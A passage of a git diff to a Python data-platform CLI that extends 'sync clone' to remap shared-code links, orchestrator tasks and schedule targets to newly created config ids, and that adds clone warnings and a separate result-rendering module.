print_clone_result(formatter: Any, result: dict[str, Any]) -> None: + """Print a ``sync clone`` result, then its warnings on stderr. + + A warning message quotes config and task names, which can hold ``[...]``. + It is escaped so Rich prints it as text instead of reading it as markup. + """ + _format_clone_result(formatter, result) + for warn in result.get("warnings", []): + formatter.warning(f" {escape(warn['message'])}") + + +def _print_clone_buckets(formatter: Any, result: dict[str, Any]) -> None: + """Print the ``--create-buckets`` outcome (a no-op when it was not used).""" + links = result.get("linked_buckets", []) + if result.get("buckets_created") or result.get("buckets_skipped") or links: + formatter.console.print( + f" Buckets: {result.get('buckets_created', 0)} created, {len(links)} linked, " + f"{result.get('buckets_skipped', 0)} already present" + ) + for link in links: + formatter.console.print( + f" Linked {link.get('bucket_id')} -> project {link.get('source_project_id')} " + f"bucket {link.get('source_bucket_id')}" + ) + for berr in result.get("bucket_errors", []): + formatter.warning(f" Bucket error: {berr.get('bucket_id')}: {berr.get('error')}") + + +def _format_clone_result(formatter: Any, result: dict[str, Any]) -> None: + """Human-mode rendering for ``sync clone``.""" + status = result.get("status", "") + overrides = ( + f"buckets={result.get('bucket_rewrites', 0)}, " + f"variables={result.get('variable_overrides', 0)}, " + f"renamed={result.get('renamed_instances', 0)}" + ) + if status == "dry_run": + summary = result.get("summary", {}) + formatter.console.print("[yellow]Dry run -- nothing pushed.[/yellow]") + formatter.console.print(f" Overrides applied: {overrides}") + formatter.console.print( + f" Would create {summary.get('added', 0)} config(s) in " + f"[cyan]{result.get('target_alias')}[/cyan]." + ) + return + if status == "no_changes": + formatter.console.print( + f"[green]Already cloned[/green] -- no changes to push into " + f"[cyan]{result.get('target_alias')}[/cyan]." + ) + _print_clone_buckets(formatter, result) + return + formatter.success( + f"Cloned into {result.get('target_alias')}: {result.get('created', 0)} created " + f"({overrides}, flow_task_remaps={result.get('flow_task_remaps', 0)})" + ) + _print_clone_buckets(formatter, result) + for err in result.get("errors", []): + formatter.warning( + f" Error: {err.get('change_type')} " + f"{err.get('component_id')}/{err.get('config_id')}: {err.get('message')}" + ) diff --git a/src/keboola_agent_cli/commands/context.py b/src/keboola_agent_cli/commands/context.py index 867724db3..967230f73 100644 --- a/src/keboola_agent_cli/commands/context.py +++ b/src/keboola_agent_cli/commands/context.py @@ -1640,7 +1640,17 @@ Clone a reference synced tree into a fresh target project + parameterize it (bucket_map / variable_values / instance_rename overrides), then push so every config CREATEs fresh. keboola.flow task configIds + variable links remap - reference->ULID. Idempotent (re-run -> no_changes); needs a fresh target. + reference->ULID; since vNEXT also shared-code links, legacy keboola.orchestrator + task configIds, task configRowIds and schedule targets (link_remaps counts each + kind; an unset link is an errors[] entry, a failed PUT is sent by the next push). + Idempotent (re-run -> no_changes); needs a fresh target. + Read warnings[] after a clone (also --dry-run, vNEXT+): missing_task_target (a + flow/orchestrator task runs a config not in the tree), encrypted_values_copied + (KBC:: paths the target cannot decrypt; secret_keys: plaintext in _config.yml + + sync push, unencryptable_keys: encrypt values, oauth_keys: authorize again), + data_app_not_deployed (run data-app deploy), schedule_not_active (clone never + activates schedules; flow schedule does). Only the run that creates the configs + reports them -- a re-run returns warnings: [], so keep them from the first run. Override files must be flat {{id: scalar}} mappings (0.89.0+); a nested/list/null value -> CONFIG_ERROR naming the key + type. Clone recreates the reference's storage buckets in the target from diff --git a/src/keboola_agent_cli/commands/sync.py b/src/keboola_agent_cli/commands/sync.py index 9f4e965b5..b61f6fdb0 100644 --- a/src/keboola_agent_cli/commands/sync.py +++ b/src/keboola_agent_cli/commands/sync.py @@ -12,6 +12,7 @@ from ..constants import SYNC_ORPHAN_PREVIEW_LIMIT from ..errors import ConfigError, ErrorCode, KeboolaApiError, SyncConflictError from ._helpers import check_cli_permission, get_formatter, get_service, map_error_to_exit_code +from ._sync_clone_render import print_clone_result from ._sync_push_render import REMOTE_CHANGE_LABELS, print_push_skips, push_skips_one_liner sync_app = typer.Typer(help="Sync project configurations with local filesystem") @@ -1188,8 +1189,12 @@ def sync_clone( Copies the reference tree, applies declarative overrides (bucket_map, variable_values, instance_rename), and pushes so every config is CREATEd - fresh -- keboola.flow task configIds and transformation variable links are - remapped reference->ULID automatically. Idempotent: re-running with an + fresh -- flow and orchestrator task configIds, schedule targets, and + transformation variable and shared-code links are remapped reference->ULID + automatically. Schedules are not activated and data apps are not deployed. + The warnings list these, encrypted values the target cannot decrypt, and + tasks that run a config not in the tree. Only the run that creates the + configs reports the warnings, so keep them. Idempotent: re-running with an existing --target-dir just pushes and reports no_changes. """ formatter = get_formatter(ctx) @@ -1229,60 +1234,7 @@ def sync_clone( if formatter.json_mode: formatter.output(result) else: - _format_clone_result(formatter, result) - - -def _print_clone_buckets(formatter: Any, result: dict[str, Any]) -> None: - """Print the ``--create-buckets`` outcome (a no-op when it was not used).""" - links = result.get("linked_buckets", []) - if result.get("buckets_created") or result.get("buckets_skipped") or links: - formatter.console.print( - f" Buckets: {result.get('buckets_created', 0)} created, {len(links)} linked, " - f"{result.get('buckets_skipped', 0)} already present" - ) - for link in links: - formatter.console.print( - f" Linked {link.get('bucket_id')} -> project {link.get('source_project_id')} " - f"bucket {link.get('source_bucket_id')}" - ) - for berr in result.get("bucket_errors", []): - formatter.warning(f" Bucket error: {berr.get('bucket_id')}: {berr.get('error')}") - - -def _format_clone_result(formatter: Any, result: dict[str, Any]) -> None: - """Human-mode rendering for ``sync clone``.""" - status = result.get("status", "") - overrides = ( - f"buckets={result.get('bucket_rewrites', 0)}, " - f"variables={result.get('variable_overrides', 0)}, " - f"renamed={result.get('renamed_instances', 0)}" - ) - if status == "dry_run": - summary = result.get("summary", {}) - formatter.console.print("[yellow]Dry run -- nothing pushed.[/yellow]") - formatter.console.print(f" Overrides applied: {overrides}") - formatter.console.print( - f" Would create {summary.get('added', 0)} config(s) in " - f"[cyan]{result.get('target_alias')}[/cyan]." - ) - return - if status == "no_changes": - formatter.console.print( - f"[green]Already cloned[/green] -- no changes to push into " - f"[cyan]{result.get('target_alias')}[/cyan]." - ) - _print_clone_buckets(formatter, result) - return - formatter.success( - f"Cloned into {result.get('target_alias')}: {result.get('created', 0)} created " - f"({overrides}, flow_task_remaps={result.get('flow_task_remaps', 0)})" - ) - _print_clone_buckets(formatter, result) - for err in result.get("errors", []): - formatter.warning( - f" Error: {err.get('change_type')} " - f"{err.get('component_id')}/{err.get('config_id')}: {err.get('message')}" - ) + print_clone_result(formatter, result) @sync_app.command("branch-link") diff --git a/src/keboola_agent_cli/errors.py b/src/keboola_agent_cli/errors.py index 2ceeadd17..10f6b1f50 100644 --- a/src/keboola_agent_cli/errors.py +++ b/src/keboola_agent_cli/errors.py @@ -106,6 +106,7 @@ class ErrorCode(StrEnum): # Sync PARENT_CONFIG_NOT_TRACKED = "PARENT_CONFIG_NOT_TRACKED" VARIABLE_LINK_UNRESOLVED = "VARIABLE_LINK_UNRESOLVED" + LINK_UNRESOLVED = "LINK_UNRESOLVED" SYNC_CONFLICT = "SYNC_CONFLICT" SYNC_LEGACY_BOUNDARY = "SYNC_LEGACY_BOUNDARY" diff --git a/src/keboola_agent_cli/result_models.py b/src/keboola_agent_cli/result_models.py index 54877e5c0..c8e522e6d 100644 --- a/src/keboola_agent_cli/result_models.py +++ b/src/keboola_agent_cli/result_models.py @@ -222,6 +222,13 @@ class CloneResult(_ApiResultModel): flow_task_remaps: int = Field( default=0, description="keboola.flow task configIds remapped reference->ULID." ) + link_remaps: dict[str, int] = Field( + default_factory=dict, + description=( + "Links remapped reference->ULID per kind: flow_tasks, orchestrator_tasks, " + "schedule_targets, shared_code, config_row_ids. Empty when nothing was remapped." + ), + ) buckets_created: int = Field( default=0, description="Storage buckets created in the target (--create-buckets)." ) @@ -241,6 +248,14 @@ class CloneResult(_ApiResultModel): errors: list[dict[str, Any]] = Field( default_factory=list, description="Per-change push errors, if any." ) + warnings: list[dict[str, Any]] = Field( + default_factory=list, + description=( + "Push warnings plus what the target still needs: tasks that run a config not in " + "the tree, copied encrypted values, undeployed data apps, inactive schedules. " + "Only the run that creates the configs reports them." + ), + ) @property def ok(self) -> bool: diff --git a/src/keboola_agent_cli/services/_sync_bindings.py b/src/keboola_agent_cli/services/_sync_bindings.py index c86b91844..461c02331 100644 --- a/src/keboola_agent_cli/services/_sync_bindings.py +++ b/src/keboola_agent_cli/services/_sync_bindings.py @@ -6,11 +6,13 @@ ``_write_config_file``, ``_compute_config_hashes``) rather than methods, so the typing stays explicit and the binding logic is testable in isolation. -- **Phase C** (:func:`resolve_variable_bindings`): rebind a transformation's - ``variables_id`` / ``variables_values_id`` placeholders to the ULIDs created - this push. -- **Phase D** (:func:`resolve_flow_task_bindings`): remap ``keboola.flow`` task - ``configId``s to the ULIDs created this push. +- **Phase C** (:func:`resolve_transformation_bindings`): rebind a + transformation's ``variables_id`` / ``variables_values_id`` placeholders and + its ``shared_code_id`` / ``shared_code_row_ids`` (plus the ``{{}}`` + script placeholders) to the ULIDs created this push. +- **Phase D** (:func:`resolve_run_target_bindings`): remap ``keboola.flow`` and + legacy ``keboola.orchestrator`` task ``configId``s and the + ``keboola.scheduler`` target to the ULIDs created this push. Both run after the create passes, PUT the corrected config, rewrite the local ``_config.yml``, and refresh the manifest hashes so a re-push is clean. @@ -20,6 +22,9 @@ import copy import logging +import re +from dataclasses import dataclass, field +from pathlib import Path from typing import TYPE_CHECKING, Any from ..errors import ErrorCode, KeboolaApiError @@ -29,6 +34,9 @@ from ._sync_baseline import apply_stamp, config_baseline from ._sync_models import ( FLOW_COMPONENT_ID, + ORCHESTRATOR_COMPONENT_ID, + SCHEDULER_COMPONENT_ID, + SHARED_CODE_COMPONENT_ID, VARIABLES_COMPONENT_ID, CreatedConfig, FlowBindingResult, @@ -41,23 +49,91 @@ logger = logging.getLogger(__name__) +# The platform replaces ``{{ }}`` in a script array element with the +# shared-code row's code (configuration-variables-resolver SharedCodeResolver: +# ``/{{([ a-zA-Z0-9_-]+)}}/``, the match trimmed). Other ``{{name}}`` +# placeholders are variables and are left untouched. +_SHARED_CODE_PLACEHOLDER = re.compile(r"\{\{( *)([a-zA-Z0-9_-]+)( *)\}\}") + +# The code files ``code_extraction`` writes a transformation's +# ``parameters.blocks`` scripts into; the placeholders live there on disk. +_SCRIPT_FILENAMES: tuple[str, ...] = ("transform.sql", "transform.py") + +# The configs whose job is to run another config, mapped to the push-error +# ``change_type`` of a failed remap. +_RUN_TARGET_LINK_TYPES: dict[str, str] = { + FLOW_COMPONENT_ID: "flow_task_link", + ORCHESTRATOR_COMPONENT_ID: "flow_task_link", + SCHEDULER_COMPONENT_ID: "schedule_target_link", +} + +# Added to the error of a failed link PUT. The local files already carry the +# new ids and the manifest hash stays stale, so the next push sees a modified +# config and sends them. +_LINK_RETRY_HINT = ( + "The local files already hold the new ids: run `kbagent sync push` again to send them." +) + # --------------------------------------------------------------------------- -# Phase C: transformation -> variables links +# Phase C: transformation -> variables / shared-code links # --------------------------------------------------------------------------- -def resolve_variable_bindings( +def resolve_transformation_bindings( service: SyncService, client: Any, *, created_configs: list[CreatedConfig], created_id_map: dict[tuple[str, str], str], - created_row_id_map: dict[str, str], + created_row_id_map: dict[tuple[str, str], str], created_rows_by_parent: dict[str, list[str]], manifest: Manifest, branch_id: int | None, ) -> VariableBindingResult: + """Rebind transformation links to the configs and rows created this push. + + Runs the variables pass, then the shared-code pass (CLI-24). The second + pass re-reads the local file that the first one rewrote, so a + transformation that has both links gets both. + """ + result = VariableBindingResult() + _bind_variables( + service, + client, + result, + created_configs=created_configs, + created_id_map=created_id_map, + created_row_id_map=created_row_id_map, + created_rows_by_parent=created_rows_by_parent, + manifest=manifest, + branch_id=branch_id, + ) + _bind_shared_code( + service, + client, + result, + created_configs=created_configs, + created_id_map=created_id_map, + created_row_id_map=created_row_id_map, + manifest=manifest, + branch_id=branch_id, + ) + return result + + +def _bind_variables( + service: SyncService, + client: Any, + result: VariableBindingResult, + *, + created_configs: list[CreatedConfig], + created_id_map: dict[tuple[str, str], str], + created_row_id_map: dict[tuple[str, str], str], + created_rows_by_parent: dict[str, list[str]], + manifest: Manifest, + branch_id: int | None, +) -> None: """Rebind transformation -> variables links from placeholders to ULIDs. On a fresh CREATE the transformation config is POSTed with its @@ -75,8 +151,6 @@ def resolve_variable_bindings( it binds to that one with a warning; zero or ambiguous (>1) matches accumulate an error rather than writing a broken link. """ - result = VariableBindingResult() - created_variables_ulids = [ ulid for (component_id, _placeholder), ulid in created_id_map.items() @@ -139,14 +213,12 @@ def resolve_variable_bindings( "error_code": ErrorCode.VARIABLE_LINK_UNRESOLVED, "component_id": created.component_id, "config_id": created.config_id, - "message": str(exc), + "message": f"{exc} {_LINK_RETRY_HINT}", } ) continue result.configs_rewritten += 1 - return result - def _resolve_variables_parent( *, @@ -202,7 +274,7 @@ def _resolve_variables_row( created: CreatedConfig, parent_ulid: str, vals_placeholder: str, - created_row_id_map: dict[str, str], + created_row_id_map: dict[tuple[str, str], str], created_rows_by_parent: dict[str, list[str]], errors: list[dict[str, str]], ) -> str | None: @@ -213,7 +285,7 @@ def _resolve_variables_row( when ``vals_placeholder`` was actually requested). """ if vals_placeholder: - mapped = created_row_id_map.get(vals_placeholder) + mapped = created_row_id_map.get((parent_ulid, vals_placeholder)) if mapped is not None: return mapped siblings = created_rows_by_parent.get(parent_ulid, []) @@ -266,6 +338,10 @@ def _apply_variable_binding( code-merged to build the full PUT body so blocks/code stay only in their companion files. Uses :meth:`KeboolaClient.update_config` (PUT) directly -- **not** ``set_variables``, which would create a *second* variables config. + + The local file is rewritten even when the PUT fails, and the manifest hash + is then left as it was. The next push sees a modified config and sends the + link again. """ merged = copy.deepcopy(local_data) merge_code_files(created.component_id, merged, created.config_dir) @@ -280,13 +356,22 @@ def _apply_variable_binding( if row_ulid: configuration["variables_values_id"] = row_ulid - response = client.update_config( - component_id=created.component_id, - config_id=created.config_id, - configuration=configuration, - change_description="Resolve variables link via kbagent sync push", - branch_id=branch_id, - ) + # Rewrite the local _configuration_extra to the ULIDs (pristine data: + # no merged blocks leak into _config.yml). + extra = local_data.setdefault("_configuration_extra", {}) + extra["variables_id"] = parent_ulid + if row_ulid: + extra["variables_values_id"] = row_ulid + try: + response = client.update_config( + component_id=created.component_id, + config_id=created.config_id, + configuration=configuration, + change_description="Resolve variables link via kbagent sync push", + branch_id=branch_id, + ) + finally: + service._write_config_file(created.config_dir, local_data) logger.info( "Resolved variables link for %s/%s -> variables_id=%s variables_values_id=%s", created.component_id, @@ -295,14 +380,6 @@ def _apply_variable_binding( row_ulid, ) - # Rewrite the local _configuration_extra to the ULIDs (pristine data: - # no merged blocks leak into _config.yml). - extra = local_data.setdefault("_configuration_extra", {}) - extra["variables_id"] = parent_ulid - if row_ulid: - extra["variables_values_id"] = row_ulid - service._write_config_file(created.config_dir, local_data) - # config_hash includes _configuration_extra, so refresh the stored # hashes from the post-rewrite disk state or sync diff sees a conflict. _refresh_binding_hashes( @@ -357,38 +434,310 @@ def _refresh_binding_hashes( # --------------------------------------------------------------------------- -# Phase D: keboola.flow task configId remap (#426) +# Phase C, second pass: transformation -> shared-code links (CLI-24) # --------------------------------------------------------------------------- -def resolve_flow_task_bindings( +@dataclass(frozen=True) +class SharedCodeLink: + """A transformation's shared-code link, re-pointed to the ids created this push. + + ``config_id`` is the new ``shared_code_id``. ``row_id_map`` maps each old + row id (in ``shared_code_row_ids`` and in the ``{{}}`` script + placeholders) to its new id. ``unmapped_row_ids`` are listed rows that have + no new row under the new shared-code config, for example because the row + create failed. + """ + + config_id: str + row_id_map: dict[str, str] + unmapped_row_ids: list[str] + + +def _bind_shared_code( service: SyncService, client: Any, + result: VariableBindingResult, *, created_configs: list[CreatedConfig], created_id_map: dict[tuple[str, str], str], + created_row_id_map: dict[tuple[str, str], str], + manifest: Manifest, + branch_id: int | None, +) -> None: + """Rebind transformation -> shared-code links from source ids to ULIDs. + + A transformation uses shared code through ``shared_code_id`` (the + ``keboola.shared-code`` config), ``shared_code_row_ids`` (its rows) and one + ``{{}}`` placeholder per row in its scripts. After a fresh CREATE + (e.g. ``sync clone``) all three still carry the source ids, and the job + fails to read the shared code. This pass sets them to the ids created this + push, PUTs the corrected configuration, rewrites the local files and + refreshes the manifest hashes, like the variables pass. + + A no-op when the transformation's shared-code config and rows were not + created this push (they may be pre-existing configs). A listed row that + cannot be re-pointed is an error, not a silent skip. + """ + for created in created_configs: + if created.component_id == SHARED_CODE_COMPONENT_ID: + continue + local_data = service._read_config_file(created.config_dir) + if local_data is None: + continue + extra = local_data.get("_configuration_extra") + if not isinstance(extra, dict): + continue + link = _resolve_shared_code_link( + extra, created_id_map=created_id_map, created_row_id_map=created_row_id_map + ) + if link is None: + continue + if link.unmapped_row_ids: + unmapped = ", ".join(link.unmapped_row_ids) + result.errors.append( + { + "change_type": "shared_code_link", + "error_code": ErrorCode.LINK_UNRESOLVED, + "component_id": created.component_id, + "config_id": created.config_id, + "message": ( + f"shared_code_row_ids {unmapped} have no row under shared-code config " + f"{link.config_id} created in this push, so they keep the old ids. " + "Check the shared-code rows and set the ids by hand." + ), + } + ) + try: + _apply_shared_code_binding( + service, + client, + created=created, + local_data=local_data, + link=link, + manifest=manifest, + branch_id=branch_id, + warnings=result.warnings, + ) + except KeboolaApiError as exc: + result.errors.append( + { + "change_type": "shared_code_link", + "error_code": ErrorCode.API_ERROR, + "component_id": created.component_id, + "config_id": created.config_id, + "message": f"{exc} {_LINK_RETRY_HINT}", + } + ) + continue + result.configs_rewritten += 1 + result.shared_code_links += 1 + + +def _resolve_shared_code_link( + extra: dict[str, Any], + *, + created_id_map: dict[tuple[str, str], str], + created_row_id_map: dict[tuple[str, str], str], +) -> SharedCodeLink | None: + """Return the re-pointed shared-code link of a transformation, or ``None``. + + ``None`` when the transformation has no shared-code link or none of its + ids was created this push. A row is looked up under the (new) shared-code + config only, so two shared-code configs with the same row id cannot swap + rows. When the shared-code config was created this push, every row it has + is new too, so a listed row id without a new row is ``unmapped``. + """ + raw_config_id = extra.get("shared_code_id") + if not isinstance(raw_config_id, (str, int)) or raw_config_id == "": + return None + old_config_id = str(raw_config_id) + config_id = created_id_map.get((SHARED_CODE_COMPONENT_ID, old_config_id), old_config_id) + config_created = config_id != old_config_id + old_row_ids = extra.get("shared_code_row_ids") + row_id_map: dict[str, str] = {} + unmapped_row_ids: list[str] = [] + for raw_row_id in old_row_ids if isinstance(old_row_ids, list) else []: + old_row_id = str(raw_row_id) + new_row_id = created_row_id_map.get((config_id, old_row_id)) + if new_row_id is None: + if config_created: + unmapped_row_ids.append(old_row_id) + elif new_row_id != old_row_id: + row_id_map[old_row_id] = new_row_id + if not config_created and not row_id_map: + return None + return SharedCodeLink( + config_id=config_id, row_id_map=row_id_map, unmapped_row_ids=unmapped_row_ids + ) + + +def rewrite_shared_code_placeholders(text: str, row_id_map: dict[str, str]) -> str: + """Replace each ``{{}}`` in ``text`` with ``{{}}``. + + Keeps the spaces inside the braces. A placeholder whose id is not in + ``row_id_map`` (a variable, or a row that was not re-pointed) is left as is. + """ + + def _swap(match: re.Match[str]) -> str: + new_row_id = row_id_map.get(match.group(2)) + if new_row_id is None: + return match.group(0) + return "{{" + match.group(1) + new_row_id + match.group(3) + "}}" + + return _SHARED_CODE_PLACEHOLDER.sub(_swap, text) + + +def _rewrite_list_placeholders(node: Any, row_id_map: dict[str, str]) -> Any: + """Rewrite the placeholders in every string list element under ``node``. + + The platform replaces shared code only inside arrays (a script is a list + of statements), so a plain string value is never a placeholder. + """ + if isinstance(node, dict): + return {key: _rewrite_list_placeholders(value, row_id_map) for key, value in node.items()} + if isinstance(node, list): + return [ + rewrite_shared_code_placeholders(item, row_id_map) + if isinstance(item, str) + else _rewrite_list_placeholders(item, row_id_map) + for item in node + ] + return node + + +def _repoint_shared_code(config_data: dict[str, Any], link: SharedCodeLink) -> None: + """Set a local-format config's shared-code ids and inline script placeholders.""" + extra = config_data["_configuration_extra"] + extra["shared_code_id"] = link.config_id + old_row_ids = extra.get("shared_code_row_ids") + if isinstance(old_row_ids, list): + extra["shared_code_row_ids"] = [link.row_id_map.get(str(r), r) for r in old_row_ids] + if "parameters" in config_data: + config_data["parameters"] = _rewrite_list_placeholders( + config_data["parameters"], link.row_id_map + ) + + +def _rewrite_script_files(config_dir: Path, row_id_map: dict[str, str]) -> None: + """Rewrite the script placeholders in a config's extracted code files.""" + for filename in _SCRIPT_FILENAMES: + path = config_dir / filename + if not path.exists(): + continue + text = path.read_text(encoding="utf-8") + rewritten = rewrite_shared_code_placeholders(text, row_id_map) + if rewritten != text: + path.write_text(rewritten, encoding="utf-8") + + +def _apply_shared_code_binding( + service: SyncService, + client: Any, + *, + created: CreatedConfig, + local_data: dict[str, Any], + link: SharedCodeLink, + manifest: Manifest, + branch_id: int | None, + warnings: list[dict[str, Any]], +) -> None: + """PUT the re-pointed shared-code link, then rewrite the local files and hashes. + + The local files are rewritten even when the PUT fails, and the manifest + hash is then left as it was. The next push sees a modified config and + sends the link again. + """ + merged = copy.deepcopy(local_data) + merge_code_files(created.component_id, merged, created.config_dir) + _repoint_shared_code(merged, link) + _name, _description, configuration = local_config_to_api(merged) + # The whole configuration is PUT again, so guard it like the variables pass. + configuration = guard_script_shape( + created.component_id, configuration, warnings, config_id=created.config_id + ) + _repoint_shared_code(local_data, link) + try: + response = client.update_config( + component_id=created.component_id, + config_id=created.config_id, + configuration=configuration, + change_description="Resolve shared code link via kbagent sync push", + branch_id=branch_id, + ) + finally: + service._write_config_file(created.config_dir, local_data) + _rewrite_script_files(created.config_dir, link.row_id_map) + logger.info( + "Resolved shared code link for %s/%s -> shared_code_id=%s rows=%s", + created.component_id, + created.config_id, + link.config_id, + link.row_id_map, + ) + _refresh_binding_hashes( + service, + client, + created=created, + manifest=manifest, + branch_id=branch_id, + response=response, + warnings=warnings, + ) + + +# --------------------------------------------------------------------------- +# Phase D: flow / orchestrator task and schedule target remap (#426, CLI-24) +# --------------------------------------------------------------------------- + + +@dataclass +class RunTargetRemap: + """What :func:`remap_run_targets_in_place` changed in one config. + + ``references`` counts the task ``configId``s (or the schedule target) + rewritten, ``config_row_ids`` the task ``configRowIds`` entries rewritten. + ``unmapped_rows`` holds one message per task whose row ids have no new row. + """ + + references: int = 0 + config_row_ids: int = 0 + unmapped_rows: list[str] = field(default_factory=list) + + +def resolve_run_target_bindings( + service: SyncService, + client: Any, + *, + created_configs: list[CreatedConfig], + created_id_map: dict[tuple[str, str], str], + created_row_id_map: dict[tuple[str, str], str], manifest: Manifest, branch_id: int | None, ) -> FlowBindingResult: - """Remap keboola.flow task ``configId``s from source ids to ULIDs (Phase D). - - A ``keboola.flow`` config runs other configs via - ``configuration.tasks[].task.configId`` (job-type tasks only; on disk these - live under ``_configuration_extra.tasks``). When a flow is created in the - same push as the configs it targets -- e.g. a ``sync clone`` of a reference - project -- those task ``configId``s still point at the source config ids. - This pass (mirroring the Phase-C variable backfill) resolves each job task's - ``(componentId, configId)`` via ``created_id_map`` to the ULID assigned this - push, PUTs the corrected flow, rewrites the local ``_config.yml``, and - refreshes the manifest hashes so a re-push is clean. - - A no-op when no flow was created this push, or when no task references a - config created this push (the id is left untouched -- it may legitimately - point at a pre-existing config). + """Remap the configs that flows, orchestrations and schedules run (Phase D). + + A ``keboola.flow`` or legacy ``keboola.orchestrator`` config runs other + configs via ``configuration.tasks[].task.configId`` (and optionally only + some rows via ``task.configRowIds``); a ``keboola.scheduler`` config runs + ``configuration.target.configurationId``. On disk these live under + ``_configuration_extra``. When such a config is created in the same push + as the configs it runs -- e.g. a ``sync clone`` of a reference project -- + those ids still point at the source ids. This pass (mirroring the Phase-C + variable backfill) resolves each reference via ``created_id_map`` / + ``created_row_id_map`` to the ULID assigned this push, PUTs the corrected + config, rewrites the local ``_config.yml``, and refreshes the manifest + hashes so a re-push is clean. It never activates a schedule with the + Scheduler service. + + A no-op when no such config was created this push, or when no task or + target references a config created this push (the id is left untouched -- + it may legitimately point at a pre-existing config). """ result = FlowBindingResult() for created in created_configs: - if created.component_id != FLOW_COMPONENT_ID: + link_type = _RUN_TARGET_LINK_TYPES.get(created.component_id) + if link_type is None: continue local_data = service._read_config_file(created.config_dir) if local_data is None: @@ -396,16 +745,25 @@ def resolve_flow_task_bindings( extra = local_data.get("_configuration_extra") if not isinstance(extra, dict): continue - tasks = extra.get("tasks") - if not isinstance(tasks, list): - continue - remapped = remap_flow_tasks_in_place(tasks, created_id_map) - if not remapped: + remap = remap_run_targets_in_place( + created.component_id, extra, created_id_map, created_row_id_map + ) + for message in remap.unmapped_rows: + result.errors.append( + { + "change_type": link_type, + "error_code": ErrorCode.LINK_UNRESOLVED, + "component_id": created.component_id, + "config_id": created.config_id, + "message": message, + } + ) + if not remap.references: continue try: - _apply_flow_task_binding( + _apply_run_target_binding( service, client, created=created, @@ -417,46 +775,133 @@ def resolve_flow_task_bindings( except KeboolaApiError as exc: result.errors.append( { - "change_type": "flow_task_link", + "change_type": link_type, "error_code": ErrorCode.API_ERROR, "component_id": created.component_id, "config_id": created.config_id, - "message": str(exc), + "message": f"{exc} {_LINK_RETRY_HINT}", } ) continue result.configs_rewritten += 1 - result.tasks_remapped += remapped + if created.component_id == SCHEDULER_COMPONENT_ID: + result.schedule_targets += remap.references + elif created.component_id == ORCHESTRATOR_COMPONENT_ID: + result.orchestrator_tasks += remap.references + else: + result.flow_tasks += remap.references + result.config_row_ids += remap.config_row_ids return result -def remap_flow_tasks_in_place(tasks: list[Any], created_id_map: dict[tuple[str, str], str]) -> int: - """Rewrite job-task ``configId``s in a flow ``tasks`` list in place. +def task_config_ref(component_id: str, task_entry: Any) -> tuple[str, str] | None: + """Return the ``(componentId, configId)`` a flow or orchestrator task runs. + + ``None`` for a task that runs no config. A ``keboola.flow`` task is typed: + only ``task.type == 'job'`` runs a config (notification and variable tasks + do not). A legacy ``keboola.orchestrator`` task has no type; it runs a + config when it has a non-empty ``task.configId`` (it can carry an inline + ``configData`` instead). + """ + if not isinstance(task_entry, dict): + return None + task = task_entry.get("task") + if not isinstance(task, dict): + return None + if component_id == FLOW_COMPONENT_ID and task.get("type") != "job": + return None + comp = task.get("componentId") + config_id = task.get("configId") + if not isinstance(comp, str) or not isinstance(config_id, (str, int)) or config_id == "": + return None + return comp, str(config_id) + + +def remap_run_targets_in_place( + component_id: str, + extra: dict[str, Any], + created_id_map: dict[tuple[str, str], str], + created_row_id_map: dict[tuple[str, str], str], +) -> RunTargetRemap: + """Rewrite the task ``configId``s / ``configRowIds`` or the schedule target in place. - Returns the number of task references actually remapped. Only - ``task.type == 'job'`` entries carry a ``configId``; notification and - variable tasks are skipped. A task is rewritten only when - ``(componentId, configId)`` matches an entry created this push. + A reference is rewritten only when its ``(componentId, configId)`` matches + an entry created this push. A task's ``configRowIds`` are then looked up + under that new config only. """ - remapped = 0 + remap = RunTargetRemap() + if component_id == SCHEDULER_COMPONENT_ID: + remap.references = _remap_schedule_target(extra.get("target"), created_id_map) + return remap + tasks = extra.get("tasks") + if not isinstance(tasks, list): + return remap for task_entry in tasks: - if not isinstance(task_entry, dict): + ref = task_config_ref(component_id, task_entry) + if ref is None: continue - task = task_entry.get("task") - if not isinstance(task, dict) or task.get("type") != "job": + new_id = created_id_map.get(ref) + if not new_id or ref[1] == new_id: continue - comp = task.get("componentId") - old_cfg = task.get("configId") - if not isinstance(comp, str) or not isinstance(old_cfg, (str, int)): + task_entry["task"]["configId"] = new_id + remap.references += 1 + _remap_task_rows(task_entry, ref[0], new_id, created_row_id_map, remap) + return remap + + +def _remap_task_rows( + task_entry: dict[str, Any], + component_id: str, + new_config_id: str, + created_row_id_map: dict[tuple[str, str], str], + remap: RunTargetRemap, +) -> None: + """Rewrite a task's ``configRowIds`` to the rows created under its new config. + + The task's config was created this push, so each of its rows is new too. + A row id without a new row is kept and reported in ``remap.unmapped_rows``. + """ + task = task_entry["task"] + old_row_ids = task.get("configRowIds") + if not isinstance(old_row_ids, list): + return + new_row_ids: list[Any] = [] + unmapped: list[str] = [] + for old_row_id in old_row_ids: + new_row_id = created_row_id_map.get((new_config_id, str(old_row_id))) + if new_row_id is None: + unmapped.append(str(old_row_id)) + new_row_ids.append(old_row_id) continue - new_id = created_id_map.get((comp, str(old_cfg))) - if new_id and str(old_cfg) != new_id: - task["configId"] = new_id - remapped += 1 - return remapped + new_row_ids.append(new_row_id) + if new_row_id != str(old_row_id): + remap.config_row_ids += 1 + task["configRowIds"] = new_row_ids + if unmapped: + listed = ", ".join(unmapped) + remap.unmapped_rows.append( + f"Task '{task_entry.get('name', '')}' (id {task_entry.get('id', '')}) lists " + f"configRowIds {listed}, which have no row under {component_id}/{new_config_id} " + "created in this push, so they keep the old ids. Set the row ids by hand." + ) -def _apply_flow_task_binding( +def _remap_schedule_target(target: Any, created_id_map: dict[tuple[str, str], str]) -> int: + """Rewrite a schedule's ``target.configurationId`` in place; return 1 if it changed.""" + if not isinstance(target, dict): + return 0 + comp = target.get("componentId") + config_id = target.get("configurationId") + if not isinstance(comp, str) or not isinstance(config_id, (str, int)): + return 0 + new_id = created_id_map.get((comp, str(config_id))) + if not new_id or new_id == str(config_id): + return 0 + target["configurationId"] = new_id + return 1 + + +def _apply_run_target_binding( service: SyncService, client: Any, *, @@ -466,31 +911,34 @@ def _apply_flow_task_binding( branch_id: int | None, warnings: list[dict[str, Any]], ) -> None: - """PUT a remapped flow, rewrite local ``_config.yml``, refresh hashes. - - ``local_data`` already carries the remapped task ``configId``s (the caller - mutated ``_configuration_extra.tasks`` in place). A deep copy is code-merged - to build the PUT body (no-op for flows, which carry no code) so the API - receives the corrected ``configuration.tasks``. + """PUT a remapped flow / orchestration / schedule, rewrite local ``_config.yml``, refresh hashes. + + ``local_data`` already carries the remapped ids (the caller mutated + 